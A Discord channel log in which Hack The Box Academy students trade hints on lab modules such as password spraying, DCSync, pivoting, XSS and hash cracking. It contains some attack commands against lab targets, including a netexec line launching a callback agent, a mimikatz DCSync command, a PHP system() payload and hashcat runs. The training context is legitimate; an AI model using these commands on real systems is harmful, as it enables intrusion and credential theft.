#modules
That's the one that has you decrypt right?
Yeah
echo $var | wc -l not ${#var}
let me try that
Its an off-by-one issue, the author doesn't intend for you to use ${#var} in this instance
salt=$(echo -n "$var" | wc -c) , right?
Yeah -c not -l my bad
no worries
just tried that. it gave me the decrypt error & printed an incorrect value for salt
Then your loop may be wrong if the salt is wrong
yeah , could be
Simple debugging would be printing the count variable out every time the loop executes
Anyone doing web fuzzing?
I am stuck for more than 5-7 hours, not getting the exact parameters. Or I am looking in a different directory!?
Previously i got a clue about a parameter in one directory but not getting that directory! Tried for long 🙁
I’m not sure if this is relevant to your case but I was in the sharphound section and I kept using the sharphound.exe provided by HTB in C:\Tools, the legacy version and parsing it through the CE Bloodhound(apt package on kali) on my attack host. That was the root of my issue.
I had to install the latest sharphound.exe from the official GitHub repository and it worked well
Or alternatively use the legacy bloodhound provided in tools with the legacy sharphound
Skills assessment has the zip file in it, so you don’t need to gather the data, it’s already provided and I am using it but idk what’s wrong with it
The skill assessment might be providing data for the legacy bloodhound maybe ?
Maybe try with legacy bloodhound
Cool, will give it a try, thanks !
Found it!
Thank you sm for your response
@fathom pendant just tried that. didn't work sadly
but thanks again for your support
Can I DM you about this? I got the users but all sprays etc is taking ages. Could use a nudge in the right direction 🙂
Could I DM someone for help on the Attacking Common Applications - Skills Assessment II question 1? I've completed skill assessment 1 and 3, this is the last question I need for assessment 2, What is the URL of the wordpress instance. I got the sub domains, B***.domain.local. and I thought I found the WP instance at wp-login.php but apparently thats not the instance?
I want help in Identifying Unkeyed Parameters section from Abusing HTTP Misconfigurations can anyone support ?
I'm in Penetration Tester - Attacking common services - Attacking SMB - When I try to get the password for jason, using the provided password list in the resources section with crackmapexec, I get hundreds of STATUS_LOGON_FAILURE, for each username:password pair.
is this bugged or am I just cooked. I did everything else in this module but I feel like this is such a simple question that I might be overthinking?
Im cooked.
i believe nxc/cme has -windows-auth or -local-auth (i forget which it is)
@fathom pendant This is being run against the target of the module, which is a remote linux machine..? Do you have to specify anything for that?
add --local-auth
that's for non-domain joined machines
this is literally mentioned in the reading
@fathom pendant
Hey guys, can anyone help me in the web pentest path web proxy module
I am trying to make command injection via the burp and kinda stuck with it
what specific section?
Repeating requests
I did most of the work of doing the match and replace to make the injection on always
dm me what you've tried; (you also don't necessarily need to do the match & replace)
this section takes advantage of burp's repeater
if you right-click a request you can send it to repeater to modify it
the question is from the module introduction to windows command line
its on the skill assessment
last question
knowledge check on getting started module
I was able to guess admin credentials and ik the current apache version is vulnerable to rce but I have tried modifying all the php files with payload <?php system('id'); ?> and i dont think any of those is vulnerable
ik these files are hosted at http://10.129.230.184/theme/
none of those match
humm
Ok I will try all properties
Did not work
atp I just wanna get the answer, idk why isnt working
It took ages with me too.
Try reversing the order of the list of users and spray again, it shouldn't take long.
I don't remember if it's possible or not as I do not remember the lab much, but if it is, use kerbrute for spraying it's way faster than netexec.
The reason is the list has a lot of duplicates that causes it to take a lot longer than it should. Sort the list using unique option.
Can somebody help me with the rce via the theme editor-section on the module hacking wordpress?
I tried the steps it told me on the explanation but i cant find the flag
Pm
I can see that alot of people are having issues with Logrotate, i have the command and i can get it to run, if i dm my command, can anyone confirm that im right ?
i followed the guide and done both create and compress. and i have tried all three versions of rotten with 2 rev shells and a copy of the root bash
the rev shells work when i run them as htb-student. just not with the exploit :/
got it working now, just took many many runs
Need a hint for the Footprinting Lab - Hard.
for the foothold: UDP
Module: Using CrackMapExec
Proxychains with CME
For some reason -x in netexec isn't processing the command after space normally.
$netexec smb <ip-addr> -u grace -p Inlanefreight01! -x "C:\Windows\Temp\agent.exe -connect <ip-addr>:11601 -ignore-cert"
usage: nxc [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp]
[--dns-timeout DNS_TIMEOUT]
{mssql,smb,ftp,ldap,nfs,rdp,ssh,vnc,winrm,wmi} ...
nxc: error: unrecognized arguments: -connect <ip-addr>:11601 -ignore-cert
$netexec smb 10.129.204.178 -u grace -p Inlanefreight01! -x "C:\Windows\Temp\agent.exe '-connect 10.10.14.174:11601 -ignore-cert'"
usage: nxc [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp]
[--dns-timeout DNS_TIMEOUT]
{mssql,smb,ftp,ldap,nfs,rdp,ssh,vnc,winrm,wmi} ...
nxc: error: unrecognized arguments: '-connect 10.10.14.174:11601 -ignore-cert'
Found this on github https://github.com/Pennyw0rth/NetExec/issues/621 but couldn't get it to work.
Did you try with "nxc" instead of "netexec" I also had these issues, encapsulating in quotes did not work either. Worked after I used nxc instead
wow, works with nxc
Appreciate it.
annoying right 😄 glad it worked
the same problem too, can anyone help?
I followed the lesson and built the msfvenom payload, then started an nc listener. I can see the target repeatedly making requests, but no matter how many times I restart it I never get an RCE.
Any1 that finished the "Using CrackmapExec" skills assessment and can give me a nudge on Question 3? about DEV01
Hi, for the Applications of AI in InfoSec - skill assessment. Is there any specific extension to save and upload the model on? I'm getting 0 accuracy all the time when uploading
hello, can anyone help? i am doing local file inclusion module LFI and file uploads, i uploaded file and got the web shell but i cannot find the flag.txt can any1 help?
use find to search for the filename.
find does not work also
idk why but pwd works but for instalnce cat 0x70.txt
does not
maybe its because space filtering but i fix that with %20 or +
Hello! I am on the "Active Directory Enumeration & Attacks" on module "DCSync" question 2. I have launched powershell as user 'adunn' and am attempting to run mimikatz for the DCSync attack. I am getting the following error. I also looked at the solution and it seems I am running it correctly:
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\syncron
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\syncron' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)
imma try it
it does not work
or use grep HTB{*
yea good idea )::: how did i not come up with that
Does anyone know whether the EU servers are fixed on Academy yet? Thx
Hi
I need help please module Windows escalation privilege interactive with users
I created the @inventory.scf file and started Responder, but it does not work. Can anyone help me?
Hey anyone finished the XSS Phishing section of the CBBH path?
Just for reference: This was a problem in parrot's version of netexec (all fixed now), but the latest updates weren't pushed to the apt repos yet (that will likely only happen for parrot7)
everyone getting very study
I am absolutely lost in the Skills Assessment for the Incident Handling Process module;
The very first question is:
Open the alert "[InsightNexus] Admin Login via ManageEngine Web Console." Find the foreign IP address starting with "203" in the comments. Check VirusTotal for the information related to this IP address, and add the details as a comment in this alert. In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section?
However, there does not appear to be any instruction on how to Check VirusTotal (as there are questions after this that asks for the same thing). I found the ip address it pointed to, but the real virustotal does nothing and returns nothing on it. In that case, is there somewhere I'm supposed to be looking in the pwnbox itself on theHive? Because there is no clear direction here and I've been sitting on this for the better part of an hour trying to figure this out, hah.
VirusTotal has three different tabs representing three ways of search
Aye, I plugged it into URL and Search; nothing came up unfortunately
I just did a search using the IP address and managed to get a result, make sure you have the correct IP address
Wh-
Sure, I'll go back and check one sec!
I remain confused; I grabbed the only address in the comments of the alert which starts with 203, tested with both port and not using the port, searched it on VirusTotal and it came back clean every time
Carefully read the question again and you will notice something that you are not paying attention to, when you search about it everything will click
Hey everyone. I just started the Attacking LLMs module and I'm having trouble getting the flag on the "Cross-Site Scripting (XSS) 1" lab exercise. I'm capturing the cookie but it's not giving me the flag. Am I supposed to do something else with it?
Think about the encoding of the cookie
Well, as it were, the issue was on VirusTotal's end. I don't know what I clicked on the website, I did nothing different as far as I can tell, and searched the exact same way, however this time two new tabs came up that stated details and relations, which were not there before (as it just showed detections and community previously). I don't even know what changed, because I copy pasted the URL the exact same way as I had been; so while I now have the next step (I think), I'm still confused, just by Virustotal now lmao
Genuinely flabbergasted, because I did the same thing I had been doing for the better part of an hour, just to check once more - so, thank you I reckon? Maybe asking is what changed the quantum state or something Idk, but I appreciate it lol
Ahhh. . .I have figured that out as well. It had autoconverted the IP into an HTTP url. So it was searching as a URL not as an IP. 
Thank you dpgg lmao
Is anyone experiencing connectivity issues with box websites? Taking a couple minutes for a page to load, and doing IDORs isn't fun when that happens lol
Yeah I'm a bit confused if my module is having trouble working or I'm doing something wrong
Doing Mass IDOR Enumeration and have gone through all 20 uids like the question suggests. But, I'm just getting a blank page. Have tried manually in the URL, the Bash Script the module provides and Burp Intruder.
Any help pls
Hi, Im on the Attacking Web Application with Ffuf module, in the skill assessment, i belive i find the correct answer but they keep notify me that its incorrect, how can i get support about this?
Hey hope all is well, on Cross-Site Scripting (XSS) - Phishing I am pretty sure I have the correct payload for the /phishing/send.php page, anyone finish the module that can have a look please to confirm im not missing anything? thanks in advance!
So I’m still currently stuck on the responder module as a novice unable to get the responder.py to run
any help on Parameter Logic Bugs SA, I managed to unlock all modules but still cant find the flag?
Even the locked ones??
yes I did, can I DM?
someone please assist
maybe follow the instructions the command gave you 
do a locate Responder.py
then what after if it still says the same thing
ain't no way it says the same thing
show
try ./Responder.py
why are you trying to run Responder on the pwnbox, and not the attack machine vm?
also that's the starting-point pwnbox; so #starting-point
so i should do it on my virtual machine instead with openvpn?
they directed me here the last time i asked about one of them there
yeah and i'm directing you to the proper location; also pwnbox has a tun0 ip, i didn't see it was starting-point so I may have misspoke.
Ah ok thanks
yep!
In the WPA2 4-way handshake diagram, I noticed that SNonce is shown being sent from the Access Point to the Client. Shouldn't SNonce actually be sent from the Access Point to client in image 1?
Huh, the traffic is a lot slower than I expected
i just keep getting "connection refused" has anyone used ligolo for the AEN specifically ?
Hiiii is there any better alternative of link2 while using RDP it really sucks 😭
You're very close, look at the ss again and try to identify the UID of the application.
You need to install myapp_adb.zip
Also does anyone have completed shells and payloads?
What have you tried so far?
Use the manual process will yield the same result.
What have you tried so far?
Look at the code, especially the required http when constructing the http request.
Use the recommended version of frida.
I use uv as a package manager to install the specific version.
What did you get?
what have you done and what was your result?
This is the problem
You need to open a python server on port 4444, because you configured redirect ports from 4321 to 4444
What Frida version are you using?
What is your first step after downloading the assessment package?
You can dm me
ive tried that as well and it did not work i was only able to transfer the files using "listener_add --addr 0.0.0.0:4321 --to 0.0.0.0:4321 --tcp" i really dont get the issue tbh
what step did you get stuck?
@vagrant wraith ive already told you several times to stop spoiling info regarding AEN module as its tier 2
Your problem is youre fundamentally misunderstanding how the listener works
--addr is an interface on the host you're proxying through; --to is going to be the address you're routing the forward to
sorry wont happen again my bad!
A; B; C
A is your machine that only had access to B
B has access to A and C
C only has access to B
When you set a listener on addr B:1234 to A:4321, you have to send a connection from C to B:1234 that will then be forwarded to A:4321
Because C does not have a direct line to your host machine, you have to forward information.
A <-> B
B <-> C
A <//> C (directly)
It sounds like you didnt pay too much attention to the pivoting module
i really didnt ..
thanks for trying to help and btw i got it working and finally got a shell !!!! but again i guess cant spoil the issue
Your major issue was not understanding the basics. Aside from that, likely some other fundamental issues
Go back and learn it mate, pivoting is like half of what you do in networked environments
If youre struggling this hard with AEN I suggest going back through the modules
Help anyone I am stuck to answer the SQL injection fundamental question for :
- What is the password hash for the user admin ?
- Achieve remote code execution and submit the content of /flag_xxxxxx.txt below
because I can't see the login page after activating the burp proxy.
How to solve.
Forward the request in burp proxy
got this error message forward the https://localhost/login.php am i doing the wrong way ?
wrong address and protocol scheme
the target doesn't spawn in your local environment; so localhost isn't gonna go anywhere fast
Try to understand how pivoting works
Do a personal lab, and I recommend you use ligolo and play with that
Try normal pivoting and double and triple pivoting, and understand how redirect Port works
In the exam or aen i recommend to use ligolo because it's easier than other pivoting methods of the course
don't have to tell me mate I have the cert 
also as much as I like ligolo I'd advise learning how to do it with chisel/ssh and proxychains as it may be harder but it gives you a better understanding of how pivoting works overall rather than just: spawn agent go brrrr
Yes personally i don't like other methods because You need to use proxychains and You have limitations
Ssh pivoting method maybe is useful only for redirect ports
With ligolo You can use nmap in your own machine
put like this for the target ip and port show another error
looks like it IS https then;
thank you for now for your guidance it shown now the login form.
Good day all. Please which wordlist am I suppose to use for the exercise in the Burp Intruder section of the Using Web Proxies Module. i have been on these for quite awhile. Please any hint would go along way!
i believe the module tells you a specific wordlist to use
Hey all, just wondering if I'm missing something here about the Academy? I purchased the Metasploit Framework module. It starts with a preface telling us not to rely too much on tooling, okay.....the second page is two questions about Metasploit when it hasn't actually taught anything about Metasploit yet. The third page is just a blank screen. It then goes onto Unit 2, where it jumps right into a practical exam, again without yet teaching anything about Metasploit
I feel like to complete the Academy module I need to ChatGPT / Google everything, is this expected?
everything required to answer is provided by the module
I'm on Section 2 and so far it's said absolutely nothing
The preceding screen, Introduction To Metasploit, was just two exam questions which I had to Google
this is on the v2 beta yeah?
turn off the beta view and return to regular view
No. I used the wordlist from the section and nothing return 200 OK except index.html!
did you perform the attack as described by the module?
i just loaded the module in the beta view; it's working fine for me do you maybe have extension running?
yes! I did. All the payload configs and setting are same as the module's own. But I don't know where the issue is from the following: GET /admin/1.html HTTP/1.1
Ah thank you, that's solved it! Apologies I switched to beta the other day and forgot, this is the first module I'm doing.
My Firefox browser is almost vanilla, just has Proton VPN installed and running, but I doubt that's blocking HTB content.
I can see the content now 👍🏻
wrap the 1 in the payload markers so it'll look like §1§.html
i don't have proton vpn and it launched fine; perhaps something in proton's thing is blocking it
Is Wrapped! the markers removed when I pasted it here!
i'm just making sure
and you're using common.txt from SecLists?
yes! All the payload's configurations are same as being contained in the section in question!
dm me with a screenshot of what you're doing
Alright!
just did a sanity check and did it exactly as shown and it worked as expected
hey guyz i am stuck on Skills Assessment - SQL Injection Fundamentals
i am able to bypass login but no clue after that so anybody can guide please
did you mess with all the functionalities of the app?
I have DM you as you instructed. Please reply!
Had to scratch my head a bit here too. But following the steps in the module (the manual approach or the automated script approach presented) will ||get you to a location from where you could perform a file transfer of a program ||that might allow you to do ||a sync of something or other ||where you can dump out the relevant user hash.
i cant solve this question: After performing the DCSync attack, connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the Task Category of the events generated by the attack?. There are no logs for the event id 4662 or the user rocky, i tried every task category i've found in logs can someone help me
does anyone know if the sliver module covers evasion?
Hi everyone, im getting this error, does someone know how to resolve?
I feel like I'm missing something for Web Attacks | Mass IDOR Enumeration any uid I try takes ~5 minutes to load and is blank lol
Let me check Splunk - I'm at the office right now and might be able to find something for you to work off of. What is the actual question?
i already found the answer
thanks anyway
oh alright, sweet
insufficient memory available... also the file.hash goes first before the wordlist
try this: hashcat -m 22100 -a 0 file.hash /usr/share/wordlists/rockyou.txt --show
it's thinking you want to use file.hash as a wordlist against rockyou.txt with the hashfile... and Rockyou is a LARGE file
Marcie, do you by chance have a nudge on something I'm maybe doing wrong for this module?
the only thing i can think of is making sure your request is formatted correctly
Oh even if I go to the website in a normal browser and just solely click documents it's taking like 5 minutes to load lol
Have thrown in to repeater and had repeated change the request type to make sure things are formatted correctly as well
JtR as well?
that sounds like an issue with your connection then
Which is odd, restarted laptop, vpn and everything.... regular browsing is working fine too
JtR has the --wordlist= option, so it's more lenient
assuming you restarted the lab, also iirc the vpn isn't required as it's an ip:port
then it could be an issue with your vpn causing some kinda issues
yeah getting same thing w/o vpn
this webpage in particular is taking ages - not sure if it's something on the boxes end though?
Hi, for both AI evasion - first order attacks and AI evasion - Sparsity attacks you apparently don't need a VPN to connect to the modules, however, unless you are in a pwnbox you can't access any of the generated skill assessments - thing is you can't actually complete these skill assessments in the pwnbox due to the resource intensive libraries and tools we're using.
I have tried with and without VPN but I just can't access them, any advice?
Hi, in the Active Directory Enumeration & Action (Initial Enumeration of the Domain) I have an issue regarding the connection to ssh, I used "nslookup inlanefreight.com" to find the address but when I try to ssh using the ssh username@ip it doesn't work.
inlanefreight.htb/inlanefreight.local != inlanefreight.com
there should be a 'spawn target' button
Have just gone through a miserable 990 package update && upgrade on my kali - and this module's website is still taking about 5 minutes to load anything I click on... Is someone able to verify this is on my side / box side?
Web Attacks | Mass IDOR Enumeration
Please @ with replies
Disregard - after 20 minutes of loading got it
Can someone help me with payload and shell the live engagement
How can I find vulnerability on target when I can only use link2
The site name blog.inlanefreight.local
perhaps looking at the website, examining the source code, etc. also firefox is installed on the jumphost
Also can I share one more pic?
Like I use hints that have credentials for login but how can I find those credentials without the hints 😭
which one
can u PM me
Sure
the desktop
:)
I also stuck at the same module
Not able to pm you
already send u friend req. can u check
That helped a lot 😮💨
the jump host has credentials on the desktop :)
@inland oak thankyou 😭😭
This is a stupid question i think. In the Command Injection sections, they explain that if you want to check whether validation is being run in FE we can just check it on the network section. Does that apply universally?
I've been working on the passwords attacks module. I am trying to set up the pwnbox so that I can run some netexec commands like the questions asks. When I try to download the vpn connect file or the network services file it just infinitely loads, any suggestions?
Any idea why the wget network-services command isn't working?
not sure what u are trying to do
I need to download the password.list file from there, can't open it in firefox
so I can run a netexec command
why it doesnt work in firefox ?
gotcha
for nmap in general if i want to scan a UDP port like IPMI i have to use -sU. does that mean the normal scan does not scan UDP ports and vice versa? (so the UDP scan does not cover tcp ports?)
I'm doing the final part of the skill assessment in cracking passwords with hashcat.
How long is it supposed to take to find the final flag?
I cracked a bit over 500 hashes and the most common ones I've found so far has only been used 2 times, which seems a bit little imo.
disclaimer: this could be spoilers for current students in the penetration tester job role path in password attacks module so please if you still haven't reached it yet don't open the image and don't read the rest of this message
Alright this must be broken, so i was in the password attacks module, in the "Credential Hunting in Network Shares" section, and i AM frustrated, so in the exercise there's this nxc command that was mentioned in the section, and every time from my local and even from the pwnbox i get this error
ERROR NetBIOSTimeout on target <ip>: The NETBIOS connection with the remote host timed out.
i tried different smb timeouts nothing worked, if someone has any idea what can i do that would be appreciated
Web Attacks | Bypassing Encoded References
I've downloaded all 20 pdfs, but they're all blank?
nevermind - had to after re-downloading them all, we're good now
mods will probably remove this fyi, despite the disclaimer...
well maybe not, but usually they ask to remove any content from modules above tier 0.
then who can i ask for help🥲
run --debug with that nxc command, might be something in there that better explains it that error is quite generic
Thank you! I will try that
also what version of netexec have you got installed?
if its v1.3.0 or newer the bug with NetBiosTimeout is 'fixed gracefully' but I don't usually find much luck like that 😄
Version : 1.4.0
but weirdly that 'fixed gracefully' github ticket i searched for doesn't seem to be applying in my case🙃
you know that command, try "netexec" instead... im curious
nxc and netexec operate differently for me. Probably different versions but they also tend to fix issues each other face
i don't really think they differ but i could try it if things get sketchy, but for now, the academy target machines don't seem to be stable (or at least for my current module) they disconnect randomly when i am in the xfreerdp session or using the ping command (even from the pwnbox), maybe i will take a small break and come back later
at least in one other users experience and mine, they do differ, but usually netexec has issues that nxc solves (but thats not much of a dataset to prove anything 😄 just confirming my bias really)
here for example
well worth taking a break, hope you crack it!
Thanks mate! Much Appreciated❤️
figured out the final flag in hashcat skill assessment. don't understand why I didn't just make my life easier from the start....
for some reason I made the bold and moronic assumption that surely the hashes had to be salted...
is the web fuzzing modules new? swear i covered fuzzing in another module
yes, I think it's part of the CBBH -> CWES change
ah makes sense, yeah i had the cbbh path mostly done then swapped off for some blue teaming stuff and it popped up as a module i missed lol so thought it must have been added
I see, so you’d have to do these modules again to take the cwes exam?
possible i didnt finish the path or do the exam yet tho, so theyd have to be done as well yeah
Hello I'm stuck on API Attacks
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.
can any one help
Hey hope all is well, on Cross-Site Scripting (XSS) - Phishing I am pretty sure I have the correct payload for the /phishing/send.php page, anyone finish the module that can have a look please to confirm im not missing anything? thanks in advance!
Or happy to show my current payload
Hi guys, I am completing the graphql modules , specifically information disclosure. I found what appears to be the flag for that question, but it is not accepting it. It is in the regulations htb… format. Is there an issue with that lab?
You can try a little guess work if you don't mind
had to look up default ttl values but I was trying to get a concrete answer from the scans but to no avail..
@jovial walrus I deleted your post because I think that module is above tier 0. Please take care not to post content from modules above tier 0.
sry idk what this means?
and in which channel do I post queries then?
Modules are ranked by tiers. You can only post content from modules that are tier 0. You can ask questions about modules here.
for cpts path how do i find out what module tier these r and where to ask ques from modules above tier 0?
It's on the module overview page
^
ok i see it on the new layout
so i can ask ques from other module tiers on cpts channel ?
You can ask whatever questions you want from any module here. Just don't post content from the modules themselves. ie. screenshots of the modules, usernames/passwords/commands/etc.
You always want to mention the module, section, and question you're stuck on. People who can help have already done the module and don't need extra context like a screenshot of the content itself.
And if you feel like you need to reveal a little more info you can ask someone to take it to DMs
ah ok
anyone have any tips on the command injection skills assessment? just a nudge in the right direction will do!
Is anyone having difficulties in answering the questions in the modules due to case sensitive and other things? I have been typing in the correct answers yet it still says incorrect. Then I will copy it and paste it then all of a sudden it accepts it. I literally stayed on 1 section for over an hour racking my brain and rereading the section like 3x to come to find out I had the answer correct it just wasn’t accepting it because of a case sensitive which in the section it wasn’t even CAPITALIZED!! 😅😅😅
Maybe its because Im still on the free option anyways give me some feedback thanks
Most of the questions are case-sensitive
Ok cool, appreciate it
guys what is the answer of this question?
I tried Fiber optic cable but it was not correct
ok trying
no it is also wrong
I am using academy 2.0 let me revert back to the legacy mode
which module and section is this?
ahh nvm i found it
yea it's fiber-optic, i.e. without the cable @glad oxide
ok trying
thanks it worked
Which protocol manages data routing and delivery across networks?
what about this one
is it Internet protocol?
its the abbreviated version
thats one part of it
TCP/IP?
it is a whole suite
try it
I think it's bc IP is responsible only for a part of the whole process, i.e. the source and destination ip address of the packet, and the question was more about the entire flow of data between networks
Transmission control protocol. It's on layer 4 of the OSI model, the Transport layer.
That's how I remember it
Yeah I know that but it asked protocol that manages data routing
yeah that could may be the answer
Hey I am trying to exploit eternal blue smb but how can I get smbpass and smb username
I'm like 90% sure it's because ip handles the routing of data and TCP delivers it.
yeah that can be the more specific reason but isn't the TCP handles the delivering of data in a particular node with the help of ports number?
You're correct, but like I'm pretty sure the structure of their question is the reason for this trip up. Me personally reading what you pasted makes me think of it as a combined answer vs just TCP.
That's about all I got for yah
Ohk understood
it's in the reading
Hey guys and ladies, I am really confused. I am stuck on the second question of the "Windows File Transfer Methods" module on the Pen test path. I have done everything according to the question but the hash generated as per the question is wrong. Please assist?
i'm not seeing anywhere here where you unzipped the file
I believe there's an existing "upload_win.txt" that is a red herring but it's been a minute
Thanks for the reply ill investigate further.
OMS I'm such a dumb_ss, I renamed the upload file......
still not accepted ...Please assist? @autumn pilot@gilded lion@fathom pendant
you didn't name it 'upload_win.txt'
OMG! I feel so dumb! Well i am going to leave this here so ppl can see and maybe learn from my mistake lol. I got the answer thanks so Much for your help 🧡
bro anybody interested in forming a group of beginner learners in cybersecurity where we come daily and write our goals for cybersecurity and discuss what we all learned and share things and knowledge together?
Owlsec is a huge cyber community that you can join. 130k members
Yeah I know that but I am looking for some members with whom we can create a group separately
hi looking for people to study for CPTS , a study group, dm me guys
Guys i have a question for this lab:
"Find another valid user on the target GitLab instance." - Attacking Common Applications module
it's been 2 hours trying to brute force the username using || 10 mill || wordlists from seclists, am i on the right track?? i found several user but none of them is the answer.
use cirt-default-usernames.txt wordlist
thanks, bruh i didn't think usernames can be case sensitive 🫤
the metasploit framework on the CPTS path is really making my brain explode.. it is really hard to get the answer .. 😂
anyone can help ?
i found the www.d*** .. but to access the root require password. I have done everything I have
anyone
On which question do you need help?
The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.
I need help with the question above .
Drop in a shell, find the version of sudo, exit the shell, background the session and search for a module that can exploit it
Hello, I am new to the Discord. I am having difficulties in the final skills assessment portion in the AI Red Teamer Job Path - Prompt Injection module. I already gained access to the admin panel and got the admin key. I am having challenges convincing the backend chatbot checker to ban the CEO. Any assistance with this is greatly appreciated.
DM me
morning all! i'm having a bit of trouble with the command injection skills assessment. throughout the module, it teaches to rely on output from the application to tell whether the injection is successful or not. but i am not reliably getting the same kind of errors from the application in the skills assessment. any help would be much appreciated
Hi guys. I have a question about Hack The Box Academy module: OSINT: Corporate Recon
Module name: OSINT: Corporate Recon
Section name: Contact Information
I suck at the following questions, please help. Thanks.
Question: What is the email address for enterprise customer support?
What I tried.
-
Went to https://www.inlanefreight.com/index.php/contact/
Then pasted enterprise@inlanefreight.com as my answer. But it showed "Incorrect answer!" -
I already checked the hints but don't understand what should I do?
-
I also did a Google search but can't find the answer.
What kind of information did the error show? Maybe someone can help u. Also, which question are u trying? Did u look for a write up?
that module is tier 4 so there won't (or shouldn't) be any writeups
When a box module rick rolls you.... I'm leaving HTB
hi everyone, in AD domain, authentication server and TGS are both inside the DC?
About Kerberos auth
they can be, sometimes they are on separate machines to further increase security through delegation
Hi, I encountered some issues with the file inclusion skill assessment and I want to know why that happens.
Spoiler:|| I saw that the right payload was not working from the browser URL but was working from the curl command. Because of this, using ffuf I have never been able to get a positive result even though the payload was in my list.||
I also noticed that the page is not displayed properly in my browser. I used browser box provided by HTB.
Module: AD Enum & Attacks
Section: Skill Assessment Part 2
While running ||responder|| from the Linux Host, I get the text
||Skipping previously captured hash for inlanefreight\user||
However, it never captured it before or displayed it. Is there a log file where it’s stored ?
Check /usr/share/responder/logs
could anyone point me in the direction where I can find the flag in the Attacking AI - Application and System - Rogue Actions question? I went through all tables in the db with the SQLi but I'm either completely wrong or have overlooked something...
when i will complete the penetration tester path, will i be ready for the CPTS immediately?
If you complete AEN blind, (no asking for hints, not reading the module, not reading the questions), then you should know which parts of your methodology may be lacking/review before the exam
AEN?
Attacking Enterprise Networks, it's the last module in the path
i am at the 30% of the path, the road is still long
do y'all think this cert is better than a Master’s degree program?
most practical certs are gonna overshadow degrees
it makes sense
also a master's degree when you have no experience is generally gonna shoot yourself in the foot, a bachelor's is generally what most entry level positions want
i have 2 exams to get Computer Science bachelor, and im thinking to do CPTS, eJPT and OSCP in the future
this for red team only, and something about blue team as well
Thanks man !
hello I'm stuck on API Attacks
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.
I need help
hello i need help on the Login Brute Forcing module , skill assessment part 1
what do you need
thanks man, it was a connection issues
no probs good luck in the path
can anyone help? when i was doing cbbh path i missed this Using Web Proxies Repeating Requests cuz i found the flag and it said that it was not correct, btw yes, i found the flag in another directory, can anyone help? it still does not work
am i doing anything wrong?
yea also there are two flags and i compared and they are identical so maybe the machine is broken
Hello Everyone, I have a general question. While doing tasks in the academy we are provided with RDP, is there any way we can connect to the machine's command line without RDP? I tried winrm but the creds are wrong + I am not admin so cannot use psexec. Also I am on the Windows privilege escalation module
Hi everyone I’m on the Getting Started module of the Penetration tester path and having frequent connection timeout issues with the target machines in the exercises. Im trying to connect from the pwnbox. The target url initially works but soon after times out frequently and requires multiple refreshes before it is accessible again. I’ve tried restarting my pwnbox and target multiple times but same issue. Is anyone else seeing frequent connection time out issues with their target boxes?
I would have frequent connection timeout issues when failing to manage my VPN usage. For example, if you leave your VPN connection up on your computer at home, then try to use pwnbox at work, you're going to have a bad time. There was also a period of several weeks where I just couldn't maintain a connection long enough to complete exercises, only to discover I left my VPN connected on a VM on a separate desktop I completely forgot about. 🤦♂️
tl;dr check and/or refresh your VPN file, and failing that, try changing your pwnbox location
Thanks I’ll try what you mentioned
hello was wondering if i can bounce something off yall
I'm stuck on a module. I have got all other questions correct, aside from What is the kernel version used by the Linux target? (Format: x.yy.z). I can not for the life of me get it. I assume skill issue but there is only one kernel version to put in.
It helps if you provide the module name and section name
fair enough Pentest in a nutshell linux initial access
Did you first try what's mentioned in the module, bearing in mind the question seems to be asking for version number not flavor as well;
So not Ubuntu 1.23.4
Just 1.23.4
You get used to it
Hello Everyone, I have a general question. While doing tasks in the academy we are provided with RDP, is there any way we can connect to the machine's command line without RDP? I tried winrm but the creds are wrong + I am not admin so cannot use psexec. Also I am on the Windows privilege escalation module
Only if the service is open and your user has permission to use it.
What’s the best way to take notes for the modules I solve in the pentesting path? Should I copy all the commands I ran to solve the exercises and paste them into a note taking software? And what note taking software do you recommend?
Let's break down why copying the commands to solve the exercises may not be all that helpful in the long run:
- They are generally specific
- They don't show any sort of intuition or knowledge of why it worked
- They often don't show the context
I use obsidian for my notes, whenever I'm given a command/syntax i break down the options that are used alongside the context in which I may use it (if it's not implied); i.e. If i have a page that's just SMB related commands, I don't need to specify that the command works for SMB
Hi guys. I have a question about Hack The Box Academy module: OSINT: Corporate Recon
Module name: OSINT: Corporate Recon
Section name: Contact Information
I suck at the following questions, please help. Thanks.
Question: What is the email address for enterprise customer support?
What I tried.
-
Went to https://www.inlanefreight.com/index.php/contact/
Then pasted enterprise@inlanefreight.com as my answer. But it showed "Incorrect answer!" -
I already checked the hints but don't understand what should I do?
-
I also did a Google search but can't find the answer.
Anyone who can help would be appreciated.
Software: Obsidian
My approach is to understand what the questions ask me to do during the pentesting path.
- Then I open a new section that talks about a specific topic, for example Footprinting.
- After that I copy the commands I actually used during the exercises, you can also put related questions and screenshots for reference later.
- It is best that you try to understand what each option (flag) does in the command.
Later you can use the search function in the note taking app for quick reference in the future.
Extra tips: You can always refer to the man page for commands in Linux. Or even do a Google search, or ask AI for more information, which lets u understand more about what a command does in detail.
I think also it would help a lot if you were to use practical labs from the Academy x HTB Labs and do one machine when you have finished a module and then you can make connections to a scenario. When I started doing that I wished I had done it sooner tbh because I had all this theory and some good practical knowledge but in a different scenario I got a bit lost.
Anyone can help me in trust attacks skill assessment Q3?
Hi guys on Pivoting path, Chisel section do i need to downgrade the go version??
[★]$ go build
go: errors parsing go.mod: /home/htb-ac-1152543/chisel/go.mod:3: invalid go version '1.25.1': must match format 1.23
[★]$ go version
go version go1.19.8 linux/amd64
Why not just download a pre-compiled version? for linux it's in the gz one and for windows it's in the zip, keep in mind the architecture and os.
https://github.com/jpillora/chisel/releases/tag/v1.11.3
